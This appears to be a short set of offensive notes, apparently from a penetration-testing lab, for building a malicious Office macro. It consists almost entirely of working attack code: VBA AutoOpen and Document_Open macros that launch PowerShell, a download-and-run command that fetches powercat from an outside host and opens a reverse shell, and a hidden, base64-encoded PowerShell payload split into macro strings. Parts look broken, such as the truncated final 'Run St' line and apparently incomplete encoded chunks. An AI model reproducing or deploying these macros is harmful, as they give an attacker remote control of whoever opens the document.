Sub AutoOpen()
Mal
End Sub
Sub Document_Open()
Mal
End Sub
Sub Mal()
CreateObject("Wscript.Shell").Run "powershell"
End Sub
echo "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.10/powercat.ps1');powercat -c 10.10.14.10 -p 1337 -e powershell" | base64
str = "powershell.exe -nop -w hidden -e <base64 output>"
n = 50
for i in range(0, len(str), n):
print("Str = Str + " + '"' + str[i:i+n] + '"')
Sub AutoOpen()
MyMacro
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub MyMacro()
Dim Str As String
Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADEAMQA4AC4AMgAgAC0AcAA"
Str = Str + "gADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsA"
Str = Str + "A== "
CreateObject("Wscript.Shell").Run St
